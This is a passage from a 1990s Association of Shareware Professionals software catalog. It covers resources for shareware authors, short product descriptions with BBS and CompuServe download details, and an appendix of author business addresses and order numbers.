minute with a 2400 baud modem) + Description: + A compilation of messages explaining how potential shareware + authors can apply for membership in the ASP before releasing + their first shareware program. + + + Product: IBM PC Author Application + Author: Association of Shareware Professionals, 616-788-5131 + Version: n/a (11-14-92) + Look for: APPLIC.ZIP on BBSs (call 317-856-2087 to download it at + no charge); APPLIC.EXE on CompuServe in CIS:ASPFORUM forum + LIBrary 4 (or contact userID 72050,1433 for assistance). + Download size: 40k (about three minutes with a 2400 baud modem) + Description: + Information on joining the Association of Shareware + Professionals as an author member. This self-extract file + contains several necessary information files and many reasons + why you would wish to join the ASP. Specific to PC/MS-DOS + authors - see other files in this section if you program on a + different platform (Amiga or MacIntosh for example). + + + Product: Information about copyrights + Author: Association of Shareware Professionals, 616-788-5131 + Version: n/a (04-29-90) + Look for: availability unknown on BBSs; COPYRT.ARC on CompuServe + in CIS:ASPFORUM forum LIBrary 3 (or contact userID 72050,1433 + for assistance). + Download size: 3k (about one minute with a 2400 baud modem) + Description: + A compilation of messages on why & how you should copyright a + shareware program. + + Chapter 18, "About shareware" 714 + + + + Product: The Lawyer's DeskTop + Integrated legal management system. See full description on + page 359. + + Product: MacIntosh Author Application + Author: Association of Shareware Professionals, 616-788-5131 + Version: n/a (09-03-92) + Look for: availability unknown on BBSs; APPLIC.SIT on CompuServe + in CIS:ASPFORUM forum LIBrary 4 (or contact userID 72050,1433 + for assistance). + Download size: 40k (about three minutes with a 2400 baud modem) + Description: + Information on joining the Association of Shareware + Professionals as an author member. This self-extract file + contains several necessary information files and many reasons + why you would wish to join the ASP. Specific to MacIntosh + authors - see other files in this section if you program on a + different platform (Amiga or IBM PC for example). + + + Product: Official ASP Catalogs + Author: Association of Shareware Professionals, 616-788-5131 + Look for: ASP####.ZIP on BBSs; CATLOG.ZIP on CompuServe in + CIS:ASPFORUM forum LIBrary 7 (or contact userID 70007,4004 for + assistance); GEN####.ZIP on GEnie in HOSB forum LIBrary 12 (or + contact userID R.ROSENBERGE for assistance). + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + Official catalogs of software published by ASP members. You + can download these products and use them on a "try before you + buy" basis. Each catalog describes known ASP-member products + and in many cases identifies a BBS where you can download it at + no charge for evaluation. All products grouped by subject and + cross-referenced to authors' addresses via a comprehensive + index. Main edition covers all known ASP-member shareware; + monthly subset catalogs cover CompuServe, GEnie, and Windows & + OS/2. + + + Product: Shareware Reference Guides + Author: Association of Shareware Professionals, 616-788-5131 + Needs: IBM AT (80286), DOS 3.1 or better. Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: SRG??###.ZIP on BBSs; SRGCS.ZIP on CompuServe in + CIS:ASPFORUM forum LIBrary 7 (or contact userID 70007,4004 for + assistance); SRGGE.ZIP on GEnie in HOSB forum LIBrary 12 (or + contact userID R.ROSENBERGE for assistance). + Download size: 1200k (about 89 minutes with a 2400 baud modem) + Description: + Official ASP catalogs of software published by shareware + authors. You can download these products on a "try before you + buy" basis. Each catalog describes known shareware products + and in many cases identifies a BBS where you can download it at + + Chapter 18, "About shareware" 715 + + + + no charge for evaluation. All products grouped by subject and + cross-referenced to authors' addresses. Main edition covers + all known shareware; monthly subset editions cover ASP members, + CompuServe, GEnie, DOS, OS/2, Windows, WinNT, etc. + + + 18.2 For shareware authors + + Product: Shareware Tracker + Author: RMH Computer Services, 317-782-9903 + Version: 3.11 (11-05-93) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; Hard disk. + Registration fee: $29.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of unlimited phone, BBS, CompuServe, mail support; + 1-month return policy; bonus utilities; all ASP-wide offers + (see page 6). + Look for: SWT311*.ZIP on BBSs (multiple files) (call 317-784-2147 + to download it at no charge); SWTRK.ZIP on CompuServe in + CIS:IBMPRO forum LIBrary 6 (or contact userID 73567,1547 for + assistance). + SWREG#: 1495 + Download size: 440k (about 33 minutes with a 2400 baud modem) + Description: + An office manager for the shareware author. Will track users, + submissions, expenses, upgrade sales, tech support sales, + subscription sales, source code sales, and more. It has an + appointment calendar, a module to keep track of other important + names and addresses, and a pop-up calculator. Mail-merges + letters and labels to users, with submission, and to other + authors and dealers. Many pre-defined reports, and user can + define an unlimited number his own reports. Context sensitive + help. + + + Product: Universal Install + Software installation development kit. See full description on + page 487. + + + 18.3 For shareware disk vendors + + Product: Universal Install + Software installation development kit. See full description on + page 487. + + Chapter 18, "About shareware" 716 + + + + 18.4 Software tools & add-ins + + 18.4.1 For multiple programs + + Product: Content Label Rating [***] + Author: R.K. West Consulting + Version: 1.0 (10-08-94) + Needs: IBM PC, DOS 3.0 or better. 512k RAM. + Strongly recommended: VGA monitor; Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: CLR10.ZIP on BBSs; CLR.ZIP on CompuServe in CIS:PCVENK + forum LIBrary 9 (or contact userID 74774,403 for assistance). + Download size: 19k (about two minutes with a 2400 baud modem) + Description: + This is a system for labeling software and packaging to + indicate contents such as violence or sexual material which may + be of special concern to parents or other consumers prior to + purchase. Its purpose is to provide software authors and + publishers with a simple, inexpensive method of labeling or + rating their products for sale or distribution in retail stores + or other environments where such labeling may be needed or + required. + + Chapter 19, "Other" 717 + + + + + + Chapter 19 + Other + + + 19.1 Software tools & add-ins + + 19.1.1 For multiple programs + + Product: Content Label Rating [***] + Software Rating System. See full description on page 716. + + 19.1.2 For other + + Product: FontMe! + Font comparison/printing. See full description on page 578. + + + 19.2 Other + + Product: The Electronic Square + Author: Electronic Creativity Products, 206-778-4013 + Version: 1.03 (06-19-95) + Needs: IBM PC, DOS 3.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor; Hercules monitor; Mouse. + Strongly recommended: Hard disk; EMS memory. + Registration fee: $65.00 (add $5.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); 51/4" master disk(s); 12 months of + BBS, CompuServe, mail support; all ASP-wide offers (see + page 6); discounts on other products; discounts on upgrades. + 12-month free upgrading allowed. + Look for: DANCER.ZIP on BBSs (call 206-778-5416 to download it at + no charge). + SWREG#: 4779 + PsL#: 11874 + Download size: 330k (about 25 minutes with a 2400 baud modem) + Description: + Graphically executes the commands of square dancing, currently + through C-1. A must for callers, and useful for dancers to + learn more about square dancing. + + Chapter 19, "Appendixes" 718 + + + + + + + + + + + + + + + + + + + + PART 2 + Appendixes + + Appendix A, "Author addresses" 719 + + + + + + Appendix A + Author addresses + + This appendix cross-references each author to his or her pro- + duct(s). If you want to know where to write or call about a + particular product, look for it in the index and write down the + page number where the product name appears in this appendix. + Then turn to the appropriate page in this appendix and look up + the author. + + ------------------------------------------------------ + Please note! Many authors specify a shareware regis- + tration service's phone number in the "orders only" + phone field. These registration services can only + take product orders. They cannot offer any product + support; they cannot tell you anything about a pro- + duct; they cannot send you any brochures; and they + cannot forward any messages to the author. You must + call the "queries" or "fax" numbers listed for an + author in order to obtain support or to speak with the + author. + ------------------------------------------------------ + + + Product: Crowndale Tales : ESCAPE! + Author: Crowndale Productions [Paul and Cynthia Lurix] + Address: P.O. Box 719, Brookshire, TX 77423 + Orders & queries: 713-346-1552 + Fax: 713-356-1607 + + Product: Mouse Math + Author: Hufnagel Software + Address: 501H Main Street, PO Box 747, Clarion, PA 16214 + Orders & queries: 814-226-5600 + Accepts: MasterCard, Visa + Fax: 814-226-5551 + + Product: Visual Computer Dictionary Plus + Author: BlueStar Software + Address: P.O. Box 33004 Beechwood Plaza, 450 Erb St. West, + Waterloo, Ont. N2T 2M9 CANADA + + Product: The Wine Window + Author: Prospect Software + Address: 1314 E. Marietta, Peoria Heights, IL 61614 + Orders & queries: 309-682-8151 + Fax: 309-682-7641 + + Product: WinCap+ + Author: The CodeWorks+ Ltd. [David Barratt,] + Address: 413, Devonshire Road, North Shore, BLACKPOOL, Lancs., + FY2 0JP, ENGLAND + + Appendix A, "Author addresses" 720 + + + + Product: DXF Bill of Materials Generator + Author: Annabec Business Services + Address: PO Box 85, Millersburg, OH 44654 + Orders & queries: 216-674-5444 + Accepts: MasterCard, Visa + Fax: 216-674-2747 + + Products: READ, READ, READ, READ + Author: Wells Computing Services [Robert Lindsay Wells] + Address: 1405 Lynn Avenue, Clearwater, FL 34615 + Orders & queries: 813-447-0604 + + Product: Dave Dude + Author: APG [Christian Naumann and Philipp Schroeder] + Address: Egenhoferstr. 15, 81243 Munich, GERMANY + Orders: 800-2424-PSL (orders only, please) + Accepts: Discover, MasterCard, Visa + + Products: Extract It, Extract It + Author: TeraByte Unlimited + Address: 258 N. Saturmino Dr., Palm Springs, CA 92262 + + Products: Stock Wiz, Stock Wiz, Stock Wiz, Stock Wiz + Author: Informatik Inc. + Address: 304 Heritage Place, P.O. Box 868, Devon, PA 19333 + Orders & queries: 610.640.0339 + Fax: 610.610.0339 + + Product: The Lights Go Down + Author: Thomas Hoevel Software-Development [Thomas Hoevel] + Address: Saturnstr. 45, 53842 Troisdorf, GERMANY + Orders: 800-TOREGISTER (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Products: Power Edit, Power Edit, Power Edit + Author: Target Software [Robert Brinegar] + Address: Fuji Copo 3D Wakamatsu-cho 16-4 Shinjuku, Tokyo 162, + JAPAN + Orders & queries: +81-3-3207-4553 + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: +81-3-3207-4553 + + Product: SETUP.EXE + Author: Chapter One Developments Ltd. [Mike Chapman] + Address: 27 Gorse Drive, Smallfield, Surrey RH6 9GJ ENGLAND + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: (44)-0-1342-844-659 + Queries: (44)-0-973-222937 + + Appendix A, "Author addresses" 721 + + + + Product: Playground + Author: Object International, Inc. + Address: 7301 Burnet Road, 102-259, Austin, TX 78757 + Orders: 512-795-0202 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Fax: 512-795-0332 + + Product: I Ching Empower Tool + Author: Empower Tools + Address: P.O. Box 363, Newton, IL 62448-0363 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Product: Frenetic Screensaver + Author: Seraline Pty Ltd + Address: PO Box 282, Ryde, NSW 2112, AUSTRALIA + Fax: +61-2-879-4481 + Queries: +61-2-879-4482 + + Products: JobLog Project Timekeeper, JobLog Project Timekeeper + Author: Brian Sutton + Address: 8202 Cosme Road, Odessa, FL 33556 + Orders & queries: 813-920-0882 + + Products: SuperDIR, SuperDIR + Author: Cottonwood Software + Address: P.O. Box 6546, Leawood, KS 66206-0546 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 913-663-3747 + Queries: 913-663-3022 + + Product: J-Works + Author: MicroWorks Inc. + Address: 3913 Country Park Lane, Murfreesboro, TN 37129-4718 + Orders & queries: 615-896-3966 + Fax: 800-701-3006 + + Product: ListBuilder + Author: Younkin Enterprises + Address: P.O. Box 205, CedarBrook, NJ 08018 + Orders: 713-524-6394 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 713-524-6398 + Queries: 609-262-1097 + + Appendix A, "Author addresses" 722 + + + + Products: Zip Server(TM), Zip Server(TM), Zip Server(TM), Zip + Server(TM), Zip Server(TM) + Author: Redei Enterprises + Address: 1424 Brett Pl., Suite 359, San Pedro, CA 90732 + Orders & queries: 310-832-6984 + Fax: 310-832-6984 + + Product: Inventory Interface + Author: Data Interface + Address: 45074 Middlebury, Canton, MI 48188-3215 + Orders & queries: 313-981-3615 + Accepts: American Express, MasterCard, Optima, Visa + Fax: 313-981-3615 + + Product: Grow'Em + Author: Paul Postuma + Address: 16 Fullyer Drive, Quispamsis, N.B., E2G 1Y7 CANADA + Queries: 506-849-6967 + + Product: The Electronic Square + Author: Electronic Creativity Products [David Archer] + Address: P.O. Box 1734, Lynnwood, WA 98046 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 206-778-4013 + + Product: Contact Browser + Author: Moore Software Solutions [Ric Moore] + Address: P.O. Box 501783, San Diego, CA 92150-1783 + Orders & queries: 619-672-1479 + Fax: 619-672-1479 + + Product: Safe Program + Author: Regnoc Software + Address: PO Box 1253, San Ramon, CA 94583 + Orders: 800-242-4775 (orders only, please) + Accepts: Discover, MasterCard, Visa + Fax: 713-524-6398 + Queries: 510-806-0713 + + Product: Computer Dictionary + Author: Gary FitzGerald + Address: 553 Haverstraw Rd., Suffern, NY 10901 + Orders & queries: 914-357-4171 + + Products: Animated Words, Animated Words, Animated Words, + Animated Words, Animated Words, Animated Words, Animated Words, + Animated Words, Animated Words, Animated Words + Author: FLIX Productions + Address: 601 Ranch Road, DelValle, TX 78617 + + Appendix A, "Author addresses" 723 + + + + Products: SLIB10.ZIP, SLIB10.ZIP, SLIB10.ZIP, SLIB10.ZIP + Author: MIS Resources International [Wayne Edwards] + Address: 570 Colonial Park Drive, Ste 301, Roswell, GA 30075 + Orders & queries: 404-594-7500 + Fax: 404-587-1932 + + Product: Button Manager for Windows + Author: AKC Applied Knowledge Corporation [Darin Ellis] + Address: 6128 Red Willow Drive, Orleans, Ontario K1C 7J8 + CANADA + Orders: 800-2424-PSL (orders only, please) + Fax: 713-524-6398 + Queries: 613-841-6020 + + Product: Silver Wolf Desktop + Author: Silver Wolf Software + Address: P.O. Box 4232, Laguna Beach, CA 92652 + Accepts: MasterCard, Visa + + Product: Free System Resources + Author: Chet Williams + Address: 1737 Peyton Ave. 'K', Burbank, CA 91504 + Orders & queries: 818-954-9128 + + Product: MOZART (Virtuoso Edition) + Author: David Webber + Address: 484 Warrington Rd, Culcheth, Warrington, WA3 5RA + UNITED KINGDOM + + Product: Chores & Rewards + Author: K. Jeff Hayes + Address: 1055 Business Highway 64 East, P.O. Box 1459, Wendell + NC 27591 + Orders & queries: 919-365-6027 + Fax: 919-365-6082 + + Product: SuperSet - Environment Extender + Author: Ross Leidy + Address: 1966 Staunton Road, Cleveland Heights, OH 44118 + + Product: ENTER-EASE + Author: KAYL SOFTWARE + Address: 8380 Northgate Ave. #25, Canoga Park, CA 91304 + Orders: 800-242-4775 (orders only, please) + Accepts: MasterCard, Visa + + Appendix A, "Author addresses" 724 + + + + Product: Screen Saver Sampler + Author: Damsel Software Group + Address: P.O. Box 713, Concord, NH 03302-0713 + Orders & queries: 603-485-2677 + Fax: 603-485-2677 + + Product: Hubble + Author: Hubble Software Company [Griengsak Narasirisinlapa] + Address: P.O. Box 1654, Denton, TX 76202 + + Products: SCP, SCP, SCP, SCP, SCP + Author: Christopher J. Noyes Software [Christopher J. Noyes] + Address: 144 Union Street, Store A, Brooklyn, NY 11231 + Orders & queries: 718-625-2262 + Accepts: MasterCard, Visa + Fax: 718-625-6766 + + Product: SmartDraw + Author: SmartDraw Software Inc. + Address: 9974 Scripps Ranch Blvd #35, San Diego, CA 92131 + Orders: 800-501-0314 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Fax: 619-549-2830 + Queries: 619-549-0314 + + Products: AAVBSORT.DLL, AAVBSORT.DLL + Author: AA-Software International + Address: 12 ter Domaine Du Bois Joli, 06330 Roquefort-Les-Pins, + FRANCE + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: +33-93-77-19-78 + + Product: Business Clock Link + Author: BizMark Development [Mark Hicks] + Address: P.O. Box 182, Princeton, LA 71067 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 318-949-4400 + Queries: 318-949-4399 + + Product: Disk Piecharter + Author: Zorn Software [Hans Zorn] + Address: Overtoom 529 1054 LK, Amsterdam, THE NETHERLANDS + Orders: +31-206189658 (orders only, please) + Accepts: Discover, MasterCard, Visa + Fax: +31-206189658 + + Appendix A, "Author addresses" 725 + + + + Product: Flexitime/Time Logging + Author: HJS Systems + Address: 15 Falcon Close, Nuneaton, CV11 6TE UNITED KINGDOM + Orders & queries: +44-(0)1203-388031 + Fax: +44-(0)1203-352326 + + Products: WInvoices, WInvoices, WInvoices, WInvoices, + WInvoices, WInvoices, WInvoices, WInvoices + Author: Q&D Software Development [Dave Verschleiser] + Address: 10-B Sentinel Court, Chatham, NJ 07928 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Queries: 201-635-1824 + + Products: Math Bingo, Math Bingo, Math Bingo + Author: LatticeWork Software + Address: P.O. Box 362, Lafayette Hill, PA 19444 + + Product: CS/AMORT + Author: Computer Solutions, Inc. + Address: 850 S. Rancho Drive #2264, Las Vegas, NV 89106 + + Products: DRIVEMAP, DRIVEMAP + Author: Oxford House Software [Steve Leonard] + Address: 160 Oxford Way, Santa Cruz, CA 95060 + + Product: File Finder/Grouper + Author: EnGamma + Address: 2407 Cameron Mills Rd., Alexandria, VA 22302-3302 + Queries: 703-548-6869 + + Appendix A, "Author addresses" 726 + + + + Product: Basketball Statistics + Author: Gentle Productions + Address: P.O. Box 152, Shelby, MI 49455 + Orders & queries: 616-861-5157 + Accepts: MasterCard, Visa + + Product: Relor Rhyming Dictionary + Author: Doyle Bare + Address: 710 Silver Spur Rd. #119, Rolling Hills Estates, CA + 90274 + Orders & queries: 310-519-8049 + + Products: TimeClock, TimeClock, TimeClock + Author: KMR Consulting [Kenneth A. Reek] + Address: 3090 Griffin Rd, Churchville, NY 14428 + Orders & queries: 716-293-3241 + + Product: New Menus for Windows + Author: Dipl.Ing. Roger Rene Kommer + Address: Doernbergstr. 11, D-34119 Kassel, GERMANY + Orders: 800-414-4268 (orders only, please) + Accepts: Discover, MasterCard, Visa + Fax: 910-350-2937 + Queries: 910-791-7052 + + Products: PCLoan5, PCLoan5 + Author: Bottom Line Software, Inc. + Address: P.O. Box 118826, Carrollton, TX 75011-8826 + Orders & queries: 214-394-4087 + Accepts: MasterCard, Visa + Fax: 214-394-4170 + + Product: REALIZE + Author: Transcendental Technologies + Address: 17 Beechwood cl., East Doncaster, Victoria 3109 + AUSTRALIA + + Appendix A, "Author addresses" 727 + + + + Product: PhotoPat + Author: Rainbow Scan, Inc. + Address: 135 Beech Lake Court, Roswell, GA 30076 + Orders & queries: 404-642-7515 + + Products: Wordware v3.0.12a for WinWord 6, Wordware v3.0.12a + for WinWord 6, Wordware v3.0.12a for WinWord 6, Wordware + v3.0.12a for WinWord 6, Wordware v3.0.12a for WinWord 6, + Wordware v3.0.12a for WinWord 6, Wordware v3.0.12a for WinWord + 6, Wordware v3.0.12a for WinWord 6, Wordware v3.0.12a for + WinWord 6, Wordware v3.0.12a for WinWord 6, Wordware v3.0.12a + for WinWord 6, Wordware v3.0.12a for WinWord 6, Wordware + v3.0.12a for WinWord 6, Wordware v3.0.12a for WinWord 6, + Wordware v3.0.12a for WinWord 6, Wordware v3.0.12a for WinWord + 6 + Author: AMF Shareware Productions [Andrew M. Freeman] + Address: P.O. Box 189, Holbrook, NY 11741-0189 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Products: Writer's Cramp, Writer's Cramp, Writer's Cramp, + Writer's Cramp, Writer's Cramp + Author: JRE Enterprises + Address: P.O. Box 5643, Mesa, AZ 85211-5643 + + Product: Beam Cookbook + Author: SoftEngineering + Address: 1278 Glenneyre Street #185, Laguna Beach, CA 92651 + Queries: 714-497-3952 + + Product: TRAINING MANAGEMENT SYSTEM + Author: Oscar Wenholm + Address: RR 1 Box 11, Raymond, SD 57258 + Orders & queries: 605-532-3479 + + Product: SC-Scripter + Author: SplitCycle Computing + Address: 13102 Rivergate Lane, Jacksonville, FL 32223 + Orders & queries: 904-292-4770 + + Product: Spanish Helper Level One + Author: G.B. Blanchard + Address: Aptdo. de Correos 555, 29680 Estepona, Malaga, SPAIN + Orders: 800-445-3346 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 218-228-5879 + Queries: 212-598-4939 + + Product: MEGIK + Author: Advanced Topics + Address: v.XXV Aprile 9/B, 10045 Piossasco, (TO) ITALY + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 39-11-323607 + + Appendix A, "Author addresses" 728 + + + + Product: The Lawyer's DeskTop + Author: DataPro Enterprises, Inc. + Address: 11200 Westheimer, Suite 923, Houston, TX 77042 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 713-493-5429 + Queries: 713-978-7431 + + Product: NoteWorthy + Author: Braeburn Software [Bernard Hill] + Address: Hawthorn Bank, Scott's Place, Selkirk TD7 4DP + SCOTLAND + Orders & queries: +44-1750-721854 + Accepts: MasterCard, Visa + + Products: Search-N-Store, Search-N-Store + Author: Shawn Anderson SoftWare + Address: PO Box 1481, Milan, IL 61264 + Orders & queries: 309-787-4967-(X227) + Fax: 309-787-8351 + + Product: Katelin Comment Manager + Author: Katelin, Inc. + Address: 610 N. Main, Georgetown, IL 61846 + Orders & queries: 217-662-6780 + + Products: WINstall, WINstall + Author: Dovcom + Address: P.O. Box 580, Provo, UT 84603-0580 + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 801-221-4527 + + Product: Photo Show 3D + Author: Progressive Logic [Keith A. Marshall] + Address: P.O. Box 561420, Charlotte, NC 28256-1420 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Product: File Manager Jr. + Author: Charles R. Maher + th + Address: 409 North 18 Street, Coeur d'Alene, ID 83814-5460 + Orders: 800-215-3688 (orders only, please) + Accepts: MasterCard, Visa + Fax: 208-664-9743 + Queries: 208-664-3864 + + Appendix A, "Author addresses" 729 + + + + Products: Sales & Samples, Sales & Samples, Sales & Samples, + Sales & Samples + Author: C T Johnson, Inc + Address: 8126 Forestdale Dr., Charlotte, NC 28227 + Orders & queries: 704-568-9598 + Fax: 704-532-1236 + + Product: Property Master + Author: MSdataBase Solutions + Address: 614 Warrenton Terrace NE, Leesburg, VA 22075 + Orders & queries: 703-777-5660 + Accepts: Discover, MasterCard, Visa + Fax: 703-777-5440 + + Product: Zip Pro + Author: Synaptek Software + Address: 1188 Ostler Ct, Mississauga, ON L5C 3G6 CANADA + Orders: 800-465-7047 (orders only, please) + Accepts: MasterCard, Visa + Fax: 905-897-7622 + Queries: 905-276-8835 + + Products: PentaBlox, PentaBlox, PentaBlox + Author: Aquila Software [Trevor Poile] + Address: P O Box 137, Tunbridge Wells, Kent TN4 0YN UNITED + KINGDOM + Orders & queries: +44-(0)1892-531108 + + Product: RADIOSIM + Author: BREMENSON [Claude BREMENSON] + Address: 60 rue d'Herblay, 95150 Taverny, FRANCE + Accepts: MasterCard, Visa + Fax: 33-1-39-32-11-97 + + Product: RPF Zip Control + Author: RPF Software [Frank B. Fortson] + Address: P.O. Box 420457, Atlanta, GA 30342 + Fax: 404.250.0282 + + Product: BESTHES + Author: LANGUAGE SOFTWARE Co. + Address: POB 3080, Beersheva 84130 ISRAEL + Accepts: MasterCard, Visa + Fax: 972-7-433-103 + + Appendix A, "Author addresses" 730 + + + + Product: Landscape Explorer + Author: WoolleySoft + Address: Humblesknowe Cottage, Ramoyle, Dunblane, Perthshire + FK15 0BA SCOTLAND + Orders & queries: 0786-825406 + + Product: Water and Steam Properties + Author: Katmar Software [Harvey Wilson] + Address: PO Box 654, Westville 3630, SOUTH AFRICA + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Product: FundRaiser Basic + Author: Professional Support Software [Gene Weinbeck] + Address: 106 Garfield Ave, PO Box 901, West Plains, MO 65775 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 417-256-6370 + Queries: 417-256-4280 + + Product: GAKUSEI + Author: Barham Software + Address: 15507 S. Normandie Ave. #245, Gardena, CA 90247-4028 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 310-327-4862 + + Product: Activity Monitor + Author: Louis Desjardins + Address: 6142 16 Avenue, Montreal, Quebec H1X 2S8 CANADA + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Product: DO + Author: RobiNets [Larrie Hutton] + Address: 2300 Harvard Way, 130-G, Reno, NV 89502 + Orders & queries: 702-827-4682 + + Product: RMS-III: Ref.Mgn.Sys. + Author: Mulberry Software, Inc. + Address: 234 Mulberry Place, Ridgewood, NJ 07450-1617 + Fax: 201-670-1680 + Queries: 201-670-9856 + + Product: Mystic Pixels + Author: Tesuji Technology [Ronald G. White] + Address: P.O. Box 4305, Boulder, CO 80306-4305 + + Product: Wall Street Simulator - Windows + Author: Larax Software + Address: PO Box 606, Sherman, CT 06784 + + Appendix A, "Author addresses" 731 + + + + Product: LOTTO MANIA + Author: Robert O. Leafloor + Address: P.O. Box 72161, Kanata, Ontario K2K 2P4 CANADA + Orders & queries: 613-591-5525-(HOME) + + Products: Wndlib, Wndlib, Wndlib, Wndlib, Wndlib, Wndlib, + Wndlib, Wndlib, Wndlib, Wndlib + Author: Burnham Park Software, Inc. + Address: P.O. Box #814, Chicago, IL 60690-0814 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 312-922-6313 + + Product: MCBase + Author: Harry Doldersum + Address: Weerselose straat 26, 7623 DA Borne., THE NETHERLANDS + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: NL-(0)74668480 + + Products: Financial Freedom GOLD, Financial Freedom GOLD, + Financial Freedom GOLD, Financial Freedom GOLD, Financial + Freedom GOLD, Financial Freedom GOLD + Author: M & R Technologies, Inc. + Address: P.O. Box 061298, Palm Bay, FL 32906-1298 + Orders & queries: 407-951-2268 + Fax: 407-951-2268 + + Product: LAPC - Loan Advisor for the PC + Author: J.D. Consulting Associates + Address: P.O. Box 3794, Albany, NY 12203 + Orders & queries: 518-482-5789 + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 518-371-1102 + + Product: BusinessCards for Windows + Author: Michael Dvorkin + Address: 1111 Bayhill Drive #180, San Bruno, CA 94066 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 415-588-6149 + Queries: 415-588-6215 + + Product: SCAN + Author: EZ Software [John Veit] + th + Address: 1222 144 St SE, Mill Creek, WA 98012 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Products: TURF.v93, TURF.v93 + Author: Second Career Software + Address: P.O. Box 283, Sierra Vista, AZ 85636-0283 + Orders: 800-242-4775 (orders only, please) + + Appendix A, "Author addresses" 732 + + + + Product: Musical Instrument Tuner + Author: SoundByte Software [Jeff O'Dair] + Address: 5907 Mendenhall Road, Indianapolis, IN 46221 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 317-856-3860 + + Products: Serial File Copy, Serial File Copy, Serial File Copy, + Serial File Copy, Serial File Copy, Serial File Copy, Serial + File Copy, Serial File Copy, Serial File Copy, Serial File + Copy, Serial File Copy, Serial File Copy + Author: MarshallSoft Computing, Inc. + Address: PO Box 4543, Huntsville, AL 35815 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 713-524-6398 + Queries: 205-881-4630 + + Products: HQ-FAX (1-Step High Quality FAX, HQ-FAX (1-Step High + Quality FAX + Author: HTF Consulting [H. Thomas FONES] + Address: 436 Whitehall Rd. #F, Alameda, CA 94501 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 800-9-SENDFH + Queries: 510-521-1689 + + Products: RRMacCaps & RRKeySampler (TT), RRMacCaps & + RRKeySampler (TT), RRMacCaps & RRKeySampler (TT), RRMacCaps & + RRKeySampler (TT), RRMacCaps & RRKeySampler (TT), RRMacCaps & + RRKeySampler (TT) + Author: RoadRunner Computing [Elizabeth A. Swoope] + Address: P.O. Box 21635, Baton Rouge, LA 70894-1635 + Orders & queries: 504-928-0780 + Accepts: MasterCard, Visa + Fax: 504-928-0802 + + Product: National INNdex + Author: Nelson's Computer Services [Greg Nelson] + Address: PO Box 2601, Glenview, IL 60025 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 708-965-7325 + + Product: MegaWord + Author: Merlot International [Romke Soldaat] + Address: 1 ch des Moulines, 34230 St. Bauzille de la Sylve, + FRANCE + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: (+1)-314-966-1833 + Queries: (+1)-314-965-5630 + + Appendix A, "Author addresses" 733 + + + + Product: DDE Requester for Win3.x & NT + Author: Westerdale AG [Simon Westerdale] + Address: Florastrasse 34, 4600 Olten, SWITZERLAND + Orders & queries: 41-62-260935 + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 41-62-260936 + + Products: Tangram, Tangram + Author: Judah Warshaw + Address: P.O. Box 27054, Jerusalem 91270, ISRAEL + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: +972-2-830-001 + + Products: WRITE CHINESE, WRITE CHINESE, WRITE CHINESE + Author: Awareness Productions [Thomas Yee] + Address: P.O. Box 261262, Plano, TX 75026-1262 + Queries: 214-517-0279 + + Product: Contact-Lens! + Author: Kruse Control Software + Address: 30 Ridge Road, Suite 21, Ridgewood, NJ 07450 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 201-670-0677 + + Products: WStyle, WStyle, WStyle + Author: Wintertree 